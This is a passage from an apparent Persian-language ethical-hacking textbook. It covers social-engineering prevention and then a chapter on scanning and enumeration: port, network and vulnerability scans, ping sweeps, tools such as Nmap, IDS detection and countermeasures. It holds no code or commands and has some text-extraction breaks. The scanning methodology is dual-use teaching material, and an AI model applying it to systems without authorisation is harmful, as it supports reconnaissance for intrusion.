ﺗﻮاﻧﺪ ﺑﻪ اﻃﻼﻋﺎت دﺳﺘﺮﺳﻲ ﻳﺎﺑﺪ . ﻧﺤﻮه از ﺑﻴﻦ ﺑﺮدن ﻣﺴﺘﻨﺪات ﻛﺎﻏﺬي و ﻣﺤﺪودﻳﺖ ﻫﺎي دﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﻧﻴﺰ ﺑﺎﻳﺪ در ﺳﻴﺎﺳﺖ اﻣﻨﻴﺘﻲ ﻣﻮرد ﺗﻮﺟﻪ ﻗﺮار ﮔﻴﺮﻧﺪ . در ﻧﻬﺎﻳﺖ، ﺳﻴﺎﺳﺖ ﺑﺎﻳﺪ ﻣﺴﺎﺋﻞ ﻓﻨﻲ از ﻗﺒﻴﻞ اﺳﺘﻔﺎده از ﻣﻮدم ﻫﺎ و ﻛﻨﺘﺮل وﻳﺮوس را ﺷﺎﻣﻞ ﺷﻮد . .

ﻳﻜﻲ از ﻣﺰاﻳﺎي ﺳﻴﺎﺳﺖ اﻣﻨﻴﺘﻲ ﻗﻮي اﻳﻦ اﺳﺖ ﻛﻪ ﻣﺴﺌﻮﻟﻴﺖ ﻛ ﺎرﻣﻨﺪان را از داوري در ﻣﻮرد درﺧﻮاﺳﺖ ﻫﺎي ﻫﻜﺮ از ﺑﻴﻦ ﻣﻲ ﺑﺮد . اﮔﺮ ﻛﺎر ﺧﻮاﺳﺘﻪ ﺷﺪه ﺑﺎ ﺳﻴﺎﺳﺖ اﻣﻨﻴﺘﻲ ﻣﻐﺎﻳﺮت داﺷﺘﻪ ﺑﺎﺷﺪ، ﺷﺨﺺ ﻧﺒﺎﻳﺪ آن را اﻧﺠﺎم دﻫﺪ . .

ﻣﻬﻢ ﺗﺮﻳﻦ ﻣﻮﺿﻮع ﺑﺮاي ﭘﻴﺸﮕﻴﺮي از ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ، آﻣﻮزش ﭘﺮﺳﻨﻞ اﺳﺖ . ﺑﺎﻳﺴﺘﻲ ﻫﻤﻪ ﭘﺮﺳﻨﻞ آﻣﻮزش ﺑﺒﻴﻨﻨﺪ ﻛﻪ ﭼﮕﻮﻧﻪ اﻃﻼﻋﺎت ﻣﺤﺮﻣﺎ ﻧﻪ ﺧﻮد را ﺣﻔﻆ ﻛﻨﻨﺪ . ﺗﻴﻢ ﻫﺎي ﻣﺪﻳﺮﻳﺘﻲ، در اﻳﺠﺎد و ﭘﻴﺎده ﺳﺎزي ﺳﻴﺎﺳﺖ اﻣﻨﻴﺘﻲ درﮔﻴﺮ ﻫﺴﺘﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ، آﻧﻬﺎ ﻛﺎﻣﻼ آن را درك و ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲ ﻛﻨﻨﺪ . ﻫﺮ ﺳﺎل ﺑﺎﻳﺪ ﻛﻼس ﻫﺎ ﻳﻲ داﻳﺮ ﺷﻮد ﺗﺎ اﻃﻼﻋﺎت ﺟﺪﻳﺪﺗﺮ و ﺑﻪ روزﺗﺮ ﺑﻪ اﻃﻼع اﻓﺮاد ﺑﺮﺳﺪ . روش دﻳﮕﺮ ﻧﻴﺰ اﻧﺘﺸﺎر ﻣﺎﻫﺎﻧﻪ، روزﻧﺎﻣﻪ ﻳﺎ ﻣﻘﺎﻻت اﻣﻨﻴﺘﻲ اﺳﺖ.

35

ﻓﺼﻞ ﺳﻮم

اﺳﻜﻦ و Enumeration

ﻣﻘﺪﻣﻪ

اﺳﻜﻦ ﻛﺮدن و enumeration ، اوﻟﻴﻦ ﻣﺮاﺣﻞ ﻫﻚ ﻫﺴﺘﻨﺪ . ﭘﺲ از ﻣﺮﺣﻠﻪ اﺳﻜﻦ، ﻣﺮﺣﻠﻪ enumeration آﻏﺎز ﻣﻲ ﮔﺮدد ﻛﻪ ﺷﺎﻣﻞ ﺷﻨﺎﺳﺎﻳﻲ ﻧﺎم ﻛﺎﻣﭙﻴﻮﺗﺮ ﻫﺎ ، اﻛﺎﻧﺖ ﻫﺎي ﻛﺎرﺑﺮ ان ، و ﻣﻨﺎﺑﻊ ﺑﻪ اﺷﺘﺮاك ﮔﺬاﺷﺘﻪ اﺳﺖ . اﺳﻜﻦ و enumeration ، ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻣﻮرد ﺑﺤﺚ ﻗﺮار ﻣﻲ ﮔﻴﺮﻧﺪ ﺑﺮاي اﻳﻨﻜﻪ ﺑﺴﻴﺎري ا ز اﺑﺰارﻫﺎي ﻫﻚ، ﻫﺮ دوي اﻳﻦ ﻛﺎرﻫﺎ را اﻧﺠﺎم ﻣﻲ دﻫ .ﻨﺪ .ﻨﺪ

اﺳﻜﻦ

در ﻃﻮل اﺳﻜﻦ، ﻫﻜﺮ ﺑﻪ دﻧﺒﺎل ﺟﻤﻊ آوري اﻃﻼﻋﺎت درﺑﺎره ﺷﺒﻜﻪ و ﺳﻴﺴﺘﻢ ﻫﺎي آن اﺳﺖ . اﻃﻼﻋﺎﺗﻲ از ﻗﺒﻴﻞ آدرس ﻫﺎي IP ، ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ، ﺳﺮوﻳﺲ ﻫﺎ، و ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﻧﺼﺐ ﺷﺪه ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﻪ ﻫﻜﺮ ﻛﻤﻚ ﻛﻨﻨﺪ ﺗﺎ ﺑﺪاﻧﺪ ﭼﻪ ﻧﻮع اﻛﺴﭙﻠﻮﻳﺖ ﻣ ﻲ ﺗﻮاﻧﺪ ﺑﺮاي ﻫﻚ ﻛﺮدن ﺳﻴﺴﺘﻢ اﺳﺘﻔﺎده ﺷﻮد . ﻫﻜﺮﻫﺎي ﻗﺎﻧﻮﻧﻤﻨﺪ، از اﺳﻜﻦ ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ آدرس ﻫﺎي IP ﺳﻴﺴﺘﻢ ﻫﺎي ﻣﻘﺼﺪ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . .

اﺳﻜﻦ ﭘﻮرت، اﺳﻜﻦ ﺷﺒﻜﻪ، و اﺳﻜﻦ آﺳﻴﺐ ﭘﺬﻳﺮي

ﭘﺲ از ﻣﺮاﺣﻞ ﺷﻨﺎﺳﺎﻳﻲ اﻛﺘﻴﻮ و ﭘﺴﻴﻮ، اﺳﻜﻦ ﺷﺮوع ﻣﻲ ﺷﻮد . ﺑﺮاي اﻳﻨﻜﻪ ﺑﺪاﻧﻴﻢ آﻳﺎ ﺳﻴﺴﺘﻢ در ﺷﺒﻜﻪ در دﺳ ﺘﺮس اﺳﺖ ﻳﺎ ﻧﻪ، اﺳﻜﻦ ﻣﻲ ﻛﻨﻴﻢ . اﺑﺰارﻫﺎي اﺳﻜﻦ، ﺑﺮاي ﺟﻤﻊ آوري اﻃﻼﻋﺎت درﺑﺎره ﻳﻚ ﺳﻴﺴﺘﻢ از ﻗﺒﻴﻞ آدرس ﻫﺎي IP ، ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ، و ﺳﺮوﻳﺲ ﻫﺎﻳﻲ ﻛﻪ ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻣﻘﺼﺪ در ﺣﺎل اﺟﺮا ﻫﺴﺘﻨﺪ اﺳﺘﻔﺎده ﻣﻲ .ﺪﻧﺷﻮ .ﺪﻧﺷﻮ

37

ﺟﺪول زﻳﺮ، ﺳﻪ ﻧﻮع اﺳﻜﻦ را ﺗﻮﺿﻴﺢ ﻣﻲ دﻫﺪ . .

ﻧﻮع اﺳﻜﻦ ﻫﺪف اﺳﻜﻦ ﭘﻮرت ( Port scanning ) ﭘﻮرت ﻫﺎ و ﺳﺮوﻳﺲ ﻫﺎي ﺑﺎز را ﻣﺸﺨﺺ ﻣﻲ ﻛﻨﺪ اﺳﻜﻦ ﺷﺒﻜﻪ ( Network scanning ) آدرس ﻫﺎي IP راﺷﻨﺎﺳﺎﻳﻲ ﻣﻲ ﻛﻨﺪ اﺳﻜﻦ آﺳﻴﺐ ﭘﺬﻳﺮي ( Vulnerability scanning ) وﺟ ﻮد آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي ﺷﻨﺎﺧﺘﻪ ﺷﺪه را ﺑﺮرﺳﻲ ﻣﻲ ﻛﻨﺪ

اﺳﻜﻦ ﭘﻮرت: ﻓﺮآﻳﻨﺪ ﺷﻨﺎﺳﺎﻳﻲ ﭘﻮرت ﻫﺎي ﺑﺎز TCP/IP ﺑﺮ روي ﻳﻚ ﺳﻴ ﺴﺘﻢ را ﻣﻲ ﮔﻮﻳﻨﺪ . اﺑﺰارﻫﺎي اﺳﻜﻦ ﭘﻮرت، ﻫﻜﺮ را ﻗﺎدر ﻣﻲ ﻧﺳﺎز ﺪ درﺑﺎره ﺳﺮوﻳﺲ ﻫﺎي ﻗﺎﺑﻞ دﺳﺘﺮس روي ﻳﻚ ﺳﻴﺴﺘﻢ اﻃﻼﻋﺎت ﻛﺴﺐ ﻛﻨﺪ . ﻫﺮ ﺳﺮوﻳﺲ ﻳﺎ ﺑﺮﻧﺎﻣﻪ روي ﻣﺎﺷﻴﻦ، ﺑﺎ ﺷﻤﺎره ﭘﻮرت ﺷﻨﺎﺧﺘﻪ ﺷﺪه اي ﻫﻤﺮاه اﺳﺖ . ﺑﺮاي ﻣﺜﺎل، اﮔﺮ اﺑﺰار اﺳﻜﻦ ﭘﻮرﺗﻲ ﻧﺸﺎن دﻫﺪ ﻛﻪ ﭘﻮرت 80 ﺑﺎز اﺳﺖ ﺑﻪ ﻣﻌﻨﺎي اﻳ ﻦ اﺳﺖ ﻛﻪ ﺑﺮ روي آن ﺳﻴﺴﺘﻢ، وب ﺳﺮور اﺟﺮا ﻣﻲ ﺷﻮد . ﻫﻜﺮﻫﺎ ﺑﺎﻳﺪ ﺑﺎ ﭘﻮرت ﻫﺎي ﻣﻌﺮوف آﺷﻨﺎ ﺑﺎﺷﻨﺪ . .

ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ وﻳﻨﺪوز، ﺷﻤﺎره ﭘﻮرت ﻫﺎي ﻣﺸﻬﻮر، در ﺷﺎﺧﻪ زﻳﺮ ﻗﺮار دارﻧﺪ : : C:\Windows\system32\drivers\etc\services

اﺳﻜﻦ ﺷﺒﻜﻪ: ﻓﺮآﻳﻨﺪ ﺷﻨﺎﺳﺎﻳﻲ دﺳﺘﮕﺎه ﻫﺎي ﻓﻌﺎل در ﺷﺒﻜﻪ اﺳﺖ ﻛﻪ ﺑﺮاي اﻧﺠﺎم ﺣﻤﻠﻪ ﻳﺎ ﺑﺮاي ارزﻳﺎﺑﻲ اﻣﻨﻴﺘﻲ ﺷﺒﻜﻪ اﻧﺠﺎم ﻣﻲ ﮔﻴﺮد . دﺳﺘﮕﺎه ﻫﺎ ﺑﺎ آدرس ﻫﺎي IP ﻣﺸﺨﺺ ﻣﻲ ﺷﻮﻧﺪ . .

اﺳﻜﻦ آﺳﻴﺐ ﭘﺬﻳﺮي: ﻓﺮآﻳﻨﺪ ﺷﻨﺎﺳﺎﻳﻲ آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي ﺳﻴﺴﺘﻢ ﻫﺎي ﻛﺎﻣﭙﻴﻮﺗﺮي ﺑﺮ روي ﺷﺒﻜﻪ اﺳﺖ . ﺑﻄﻮر ﻛﻠﻲ، ﻳﻚ اﺳﻜﻨﺮ آﺳﻴﺐ ﭘﺬﻳﺮي، اﺑﺘﺪا ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ و ﻧﺴﺨﻪ آن و ﻧﻴﺰ service pack ﻫﺎﻳﻲ ﻛﻪ ﻧﺼﺐ ﻫﺴﺘﻨﺪ را ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲ ﻛﻨﺪ ﺳﭙﺲ، ﺿﻌﻒ ﻫﺎ و آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ را ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲ ﻛﻨﺪ . در ﻣﺮﺣﻠﻪ ﺣﻤﻠﻪ، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ از اﻳﻦ آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎ ﺑﺮاي اﻳﺠﺎد دﺳﺘﺮﺳﻲ روي ﺳﻴﺴﺘﻢ اﺳﺘﻔﺎده ﻛﻨﺪ . .

ﺳﻴﺴﺘﻢ ﺗﺸﺨﻴﺺ ﻧﻔﻮذ ( IDS ،) ﻣﻲ ﺗﻮاﻧﺪ ﻓﻌﺎﻟﻴﺖ ﻫﺎي ﻣﺮﺑﻮط ﺑﻪ اﺳﻜﻦ ﭘﻮرت ر ا ﺗﺸﺨﻴﺺ دﻫﺪ . اﺑﺰارﻫﺎي اﺳﻜﻦ، ﺑﻪ دﻧﺒﺎل ﭘﻮرت ﻫﺎي TCP/IP ﻣﻲ ﮔﺮدﻧﺪ ﺗﺎ ﭘﻮرت ﻫﺎي ﺑﺎز را ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﻨﺪ ﻛﻪ اﻳﻦ ﭘﻮﻳﺶ ﭘﻮرت، ﺗﻮﺳﻂ ﺑﺴﻴﺎري از اﺑﺰارﻫﺎي ﺗﺸﺨﻴﺺ اﻣﻨﻴﺘﻲ ﻗﺎﺑﻞ ﺷﻨﺎﺳﺎﻳﻲ ﻫﺴﺘﻨﺪ . ﻫﻤﭽﻨﻴﻦ اﺳﻜﻦ ﺷﺒﻜﻪ و آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﻢ ﻣﻌﻤﻮﻻ ﻗﺎﺑﻞ ﺗﺸﺨﻴﺺ ﻫﺴﺘﻨﺪ . .

38

ﻣﺘﺪﻟﻮژي اﺳﻜﻦ

ﻣﺘﺪﻟﻮژي زﻳﺮ، ﻓﺮ آﻳﻨﺪي اﺳﺖ ﻛﻪ ﻫﻜﺮ ، ﺷﺒﻜﻪ را اﺳﻜﻦ ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﻣﺘﺪﻟﻮژي، ﻫﻜﺮ را ﻣﻄﻤﺌﻦ ﻣﻲ ﺳﺎزد ﻛﻪ ﻫﻤﻪ اﻃﻼﻋﺎت ﻻزم ﺑﺮاي اﻧﺠﺎم ﺣﻤﻠﻪ، ﺟﻤﻊ آوري ﺷﺪه اﺳﺖ . .

ﺗﻜﻨﻴﻚ ﻫﺎي Ping Sweep

ﻣﺘﺪﻟﻮژي اﺳﻜﻦ، ﺑﺎ ﺑﺮرﺳﻲ ﺳﻴﺴﺘﻢ ﻫﺎﻳﻲ ﻛﻪ در ﺷﺒﻜﻪ ﻓﻌﺎل ﻫﺴﺘﻨﺪ آﻏﺎز ﻣﻲ ﺷﻮد . ﺳﺎده ﺗﺮﻳﻦ، و در ﻋﻴﻦ ﺣﺎل درﺳﺖ ﺗﺮﻳﻦ ر وش ﺷﻨﺎﺳﺎﻳﻲ ﺳﻴﺴﺘﻢ ﻫﺎي ﻓﻌﺎل، اﻧﺠﺎم ping sweep ﺑﺮاي ﺑﺎزه آدرس IP ﺷﺒﻜﻪ اﺳﺖ . ﺗﻤﺎم ﺳﻴﺴﺘﻢ ﻫﺎﻳﻲ ﻛﻪ ﺑﻪ ping ﭘﺎﺳﺦ ﻣﻲ دﻫﻨﺪ، ﺑﻪ ﻋﻨﻮان ﺳﻴﺴﺘﻢ ﻫﺎي ﻓﻌﺎل در ﺷﺒﻜﻪ ﻣﺤﺴﻮب ﻣﻲ ﺷﻮﻧﺪ . .

اﺳﻜﻦ ICMP ، ﻓﺮآﻳﻨﺪ ارﺳﺎل ﻳﻚ درﺧﻮاﺳﺖ ICMP ﻳﺎ ping ﺑﻪ ﻫﻤﻪ دﺳﺘﮕﺎه ﻫﺎي ﺷﺒﻜﻪ ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﺳﻴﺴﺘﻢ ﻫﺎي ﻓﻌ ﺎل اﺳﺖ . ﻳﻜﻲ از ﻣﺰاﻳﺎي اﺳﻜﻦ ICMP اﻳﻦ اﺳﺖ ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺼﻮرت ﻣﻮازي اﻧﺠﺎم ﺷﻮد اﻳﻦ ﺑﺪان ﻣﻌﻨﻲ اﺳﺖ ﻛﻪ ﻫﻤﻪ ﺳﻴﺴﺘﻢ ﻫﺎ در ﻳﻚ زﻣﺎن اﺳﻜﻦ ﻣﻲ ﺷﻮﻧﺪ ﺑﻨﺎﺑﺮاﻳﻦ ﺑﻪ ﺳﺮﻋﺖ در ﺷﺒﻜﻪ اﺟﺮا ﻣﻲ ﺷﻮد . ﺑﺴﻴﺎري از اﺑﺰارﻫﺎي ﻫﻚ، داراي ﮔﺰﻳﻨﻪ Ping sweep ﻫﺴﺘﻨﺪ اﻳﻦ ﺑﺪان ﻣﻌﻨﻲ اﺳﺖ ﻛﻪ درﺧﻮاﺳﺖ ICMP ﺑﺮاي ﻫﻤﻪ دﺳﺘﮕﺎه ﻫﺎي ﺷﺒﻜﻪ اﻧﺠﺎم ﻣﻲ ﺷﻮد . .

39

ﻣﺴﺎﻟﻪ ﻗﺎﺑﻞ ﺗﻮﺟﻪ در اﻳﻦ روش اﻳﻦ اﺳﺖ ﻛﻪ ﻓﺎﻳﺮوال ﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺟﻠﻮي ﭘﺎﺳﺦ ﺳﻴﺴﺘﻢ ﺑﻪ ping sweep را ﺑﮕﻴﺮ ﺪﻧ . ﺪﻧ ﻣﺸﻜﻞ دﻳﮕﺮ اﻳﻦ اﺳﺖ ﻛﻪ ﺑﺎﻳﺴﺘﻲ دﺳﺘﮕﺎه، روﺷﻦ ﺑﺎﺷﺪ ﺗﺎ اﺳﻜﻦ اﻧﺠﺎم ﺷﻮد . .

ا ﺑﺰارﻫﺎي Friendly Pinger ، Pinger ، Angry IP Scanner ، و WS_Ping_Pro ﺑﺮاي اﻧﺠﺎم ﻛﻮﺋﺮي ﻫﺎي ICMP ﻫﺴﺘﻨﺪ . .

ﺗﺸﺨﻴﺺ Ping Sweep ﻫﺎ ﻫﺎ

ﺗﻘﺮﻳﺒﺎ ﻫﺮ ﺳﻴﺴﺘﻢ IDS ﻳﺎ Ping Sweep ، IPS ﻫﺎﻳﻲ ﻛﻪ در ﺷﺒﻜﻪ اﺗﻔﺎق ﻣﻲ اﻓﺘﻨﺪ، را ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲ ﻛﻨﻨﺪ و ﮔﺰارش ﻣﻲ دﻫﻨﺪ . ﺑﺴﻴﺎري از ﻓﺎﻳﺮوال ﻫﺎ و ﺳﺮورﻫﺎي ﭘﺮوﻛﺴﻲ، ﭘﺎﺳﺦ ﻫﺎي ping را ﻣﻲ ﺑﻨﺪﻧﺪ ﺑﻨﺎﺑﺮاﻳﻦ، ﻫﻜﺮ ﻧﻤﻲ ﺗﻮاﻧﺪ ﺑﻄﻮر دﻗﻴﻖ ﻣﺸﺨﺺ ﻛﻨﺪ ﻛﻪ آﻳﺎ ﺗﻨﻬﺎ ﺑﺎ اﺳﺘﻔﺎده از ping sweep ، ﺳﻴﺴﺘﻢ ﻫﺎ در دﺳﺘﺮس ﻫﺴﺘﻨﺪ ﻳﺎ ﻧﻪ . اﮔﺮ ﺳﻴﺴﺘﻢ ﻫﺎ، ﺑﻪ ping sweep ﭘﺎﺳﺦ ﻧﺪﻫﻨﺪ، از ﭘﻮرت اﺳﻜﻨﺮﻫﺎي ﻗﻮي ﺗﺮي ﺑﺎﻳﺪ اﺳﺘﻔﺎده ﺷﻮد . اﮔﺮ ping sweep ، ﺳﻴﺴﺘﻢ ﻓﻌﺎﻟﻲ را در ﺷﺒﻜﻪ ﻧﺸﺎن ﻧﺪﻫﺪ، ﺑﻪ اﻳﻦ ﻣﻌﻨﺎ ﻧﻴﺴﺖ ﻛﻪ وﺟﻮد ﻧﺪارد ﺷﻤﺎ ﺑﺎﻳﺪ از روش ﻫﺎي ﺟﺎﻳﮕﺰﻳﻦ ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ اﺳﺘﻔﺎده ﻛﻨﻴﺪ . ﺑﻪ ﻳﺎد

داﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻫﻚ ﻛﺮدن، زﻣﺎن ، ﺻﺒﺮ ، و ﭘﺸﺘﻜﺎر ﻣﻲ ﺧﻮاﻫﺪ . .

اﺳﻜﻦ ﭘﻮرت ﻫﺎ و ﺷﻨﺎﺳﺎﻳﻲ ﺳﺮوﻳﺲ ﻫﺎ ﻫﺎ

ﺑﺮرﺳﻲ ﭘﻮرت ﻫﺎي ﺑﺎز، ﮔﺎم دوم در ﻣﺘﺪﻟﻮژي اﺳﻜﻦ اﺳﺖ . اﺳﻜﻦ ﭘﻮرت، روﺷﻲ ﺑﺮاي ﺑﺮرﺳﻲ ﭘﻮرت ﻫﺎي ﺑﺎز اﺳﺖ . ﻓﺮآﻳﻨﺪ اﺳﻜﻦ ﭘﻮرت ﺷﺎﻣﻞ ﺟﺴﺘﺠﻮي ﺗﻤﺎم ﭘﻮرت ﻫﺎ ﺑﺮ روي ﺳﻴﺴﺘﻢ ، ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﭘﻮرت ﻫﺎي ﺑﺎز اﺳﺖ . ﺑﻄﻮر ﻛﻠﻲ، اﺳﻜﻦ ﭘﻮرت، اﻃﻼﻋﺎت ﺑﺎ ارزﺷﻲ درﺑﺎره دﺳﺘﮕﺎه ﻫﺎ و آﺳﻴﺐ ﭘﺬﻳﺮي ﺳﻴﺴﺘﻢ ﻫﺎ ﻣﻲ دﻫﺪ . .

ﺷﻨﺎﺳﺎﻳﻲ ﺳﺮوﻳﺲ، ﺳﻮﻣﻴﻦ ﻣﺮﺣﻠﻪ در ﻣﺘﺪﻟﻮژي اﺳﻜﻦ اﺳﺖ ﻛﻪ ﻣﻌﻤﻮﻻ ﺑﺎ اﺳﺘﻔﺎده از ﻫﻤﺎن اﺑﺰارﻫﺎ ﺑﻪ ﻋﻨﻮ ان اﺳﻜﻦ ﭘﻮرت اﻧﺠﺎم ﻣﻲ ﺷﻮد . ﺑﺎ ﺷﻨﺎﺳﺎﻳﻲ ﭘﻮرت ﻫﺎي ﺑﺎز، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺳﺮوﻳﺲ ﻫﺎﻳﻲ ﻛﻪ ﺑﺎ آن ﺷﻤﺎره ﭘﻮرت ﻫﺎ ﻛﺎر ﻣﻲ ﻨﻛﻨ ﺪ، را ﺗﺸﺨﻴﺺ دﻫﺪ . .

ﻣﻘﺎﺑﻠﻪ ﺑﺎ اﺳﻜﻦ ﭘﻮرت

روش ﻫﺎي ﻣﻘﺎﺑﻠﻪ، ﻓﺮآﻳﻨﺪﻫﺎ ﻳﺎ اﺑﺰارﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﺪﻳﺮان اﻣﻨﻴﺘﻲ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ ﺗﺎ اﺳﻜﻦ ﭘﻮرت ﻫﺎ ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻫﺎي ﺷﺒﻜﻪ را ﺷﻨﺎﺳﺎﻳﻲ و ﻋﻘﻴﻢ ﻛﻨ ﻨﺪ . روش ﻫﺎي زﻳﺮ ﺑﺎﻳﺪ ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از ﻛﺴﺐ اﻃﻼﻋﺎت ﺗﻮﺳﻂ ﻫﻜﺮ در ﻃﻮل اﺳﻜﻦ ﭘﻮرت، اﺟﺮا ﺷﻮد : :

40

• ﻣﻌﻤﺎري اﻣﻨﻴﺘﻲ ﺻﺤﻴﺢ، از ﻗﺒﻴﻞ ﭘﻴﺎده ﺳﺎزي IDS ﻫﺎ و ﻓﺎﻳﺮوال ﻫﺎ ﺑﺎﻳﺪ اﻧﺠﺎم ﮔﻴﺮد. • ﻫﻜﺮﻫﺎي ﻗﺎﻧﻮﻧﻤﻨﺪ، از ﻣﺠﻤﻮﻋﻪ اي از اﺑﺰارﻫﺎ ﺑﺮاي ﺗﺴﺖ ﻣﻘﺎﺑﻠﻪ ﺑﺎ اﺳﻜﻦ اﺳﺘ ﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . زﻣﺎﻧﻴﻜﻪ ﻓﺎﻳﺮواﻟﻲ ﻧﺼﺐ ﻣﻲ ﺷﻮد، اﺑﺰار اﺳﻜﻦ ﭘﻮرت ﺑﺎﻳﺪ اﺟﺮا ﺷﻮد ﺗﺎ ﻣﺸﺨﺺ ﻛﻨﺪ آﻳﺎ ﻓﺎﻳﺮوال ﻣﻲ ﺗﻮاﻧﺪ ﺑﻪ درﺳﺘﻲ از اﺳﻜﻦ ﭘﻮرت ﺟﻠﻮﮔﻴﺮي ﻛﻨﺪ ﻳﺎ ﻧﻪ. • ﻓﺎﻳﺮوال ﺑﺎﻳﺪ ﺑﺘﻮاﻧﺪ اﺑﺰار اﺳﻜﻦ ﭘﻮرت را ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ . ﻓﺎﻳﺮوال ﺑﺎﻳﺪ ﺑﺼﻮرت stateful ، ﻧﻈﺎرت داﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ اﻳﻦ ﺑﺪان ﻣﻌﻨﻲ اﺳﺖ ﻛﻪ داده ﻫﺎي ﺑﺴﺘﻪ را ﺑﺮرﺳﻲ ﻛﻨﺪ و ﺗﻨﻬﺎ ﻫﺪر TCP را ﺑﺮرﺳﻲ ﻧﻜﻨﺪ. • ﺳﻴﺴﺘﻢ ﻫﺎي ﺗﺸﺨﻴﺺ ﻧﻔﻮذ ﺷﺒﻜﻪ اي ( NIDS) ، ﺑﺎﻳﺪ ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﺑﺎ روش ﻫﺎي ﺷﻨﺎﺳﺎﻳﻲ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻫﻤﭽﻮن Nmap اﺳﺘﻔﺎده ﺷﻮد. • ﺑﺎﻳﺴﺘﻲ ﺗﻨﻬﺎ ﭘﻮرت ﻫﺎي ﻣﻮرد ﻧﻴﺎز ﺑﺎز ﺷﻮﻧﺪ و ﺑﻘﻴﻪ ﺑﺴﺘﻪ ﺑﺎﺷﻨﺪ. • ﻛﺎرﻛﻨﺎن ﺳﺎزﻣﺎن ، ﺑﺎ ﻳﺴﺘﻲ ﺑﺮاي اﺳﺘﻔﺎده از ﺳﻴﺴﺘﻢ، آﻣﻮزش اﻣﻨﻴﺘﻲ ﻣﻨﺎﺳﺐ دﻳﺪه ﺑﺎﺷﻨﺪ . آﻧﻬﺎ ﺑﺎﻳﺪ ﺳﻴﺎﺳﺖ ﻫﺎي اﻣﻨﻴﺘﻲ ﻣﺨﺘﻠﻒ را ﺑﺪاﻧﻨﺪ . .

ﺳﻮﺋﻴﭻ ﻫﺎي دﺳﺘﻮر Nmap

Nmap ، اﺑﺰار راﻳﮕﺎﻧﻲ اﺳﺖ ﻛﻪ ﺑﺎ ﻋﻤﻠﻴﺎت ping sweep ، اﺳﻜﻦ ﭘﻮرت، ﺷﻨﺎﺳﺎﻳﻲ ﺳﺮوﻳﺲ، ﺷﻨﺎﺳﺎﻳﻲ آدرس IP ، و ﺷﻨﺎﺳﺎﻳﻲ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ را ﺑﺎ ﺳﺮﻋﺖ ﺑﺎﻻﺗﺮي اﻧﺠﺎم ﻣﻲ دﻫﺪ . ﻣﺰﻳﺖ Nmap اﻳﻦ اﺳﺖ ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ ﺗﻌﺪاد زﻳﺎدي ﻣﺎﺷﻴﻦ را در ﻳﻚ ﻧﺸﺴﺖ اﺳﻜﻦ ﻛﻨﺪ و ﺗﻮﺳﻂ اﻏﻠﺐ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻫﺎ از ﻗﺒﻴﻞ ﻳﻮﻧﻴﻜﺲ، وﻳﻨﺪوز، و ﻟﻴﻨﻮﻛﺲ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲ ﺷﻮد . .

وﺿﻌﻴﺖ ﭘﻮرت ﻛﻪ ﺗﻮﺳﻂ Nmap ﻣﺸﺨﺺ ﻣﻲ ﺷﻮد ﻣﻲ ﺗﻮاﻧﺪ ﺑﺼﻮرت ﺑﺎز، ﻓﻴﻠﺘﺮ ﺷﺪه ﻳﺎ ﻓﻴﻠﺘﺮ ﻧﺸﺪه ﺑﺎﺷﺪ . ﭘﻮرت ﺑﺎز ﻳﻌﻨﻲ اﻳﻨﻜﻪ ﻣﺎﺷﻴﻦ ﻫﺪف ﺑﻪ درﺧﻮاﺳﺖ ﻫﺎي ورودي روي ﭘﻮرت ﭘﺎﺳﺦ ﻣﻲ دﻫﺪ . ﭘﻮرت ﻓﻴﻠﺘﺮ ﺷﺪه ﺑﻪ اﻳﻦ ﻣﻌﻨﻲ اﺳﺖ ﻛﻪ ﻓﺎﻳﺮوال ﻳﺎ ﻓﻴﻠﺘﺮ ﺷﺒﻜﻪ، از ﻛﺸﻒ ﭘﻮرت ﻫﺎي ﺑﺎز ﺗﻮﺳﻂ Nmap ﺟﻠﻮﮔﻴﺮي ﻣﻲ ﻛﻨﻨﺪ . ﭘﻮرت ﻓﻴﻠﺘﺮ ﻧﺸﺪه ﺑﻪ اﻳﻦ 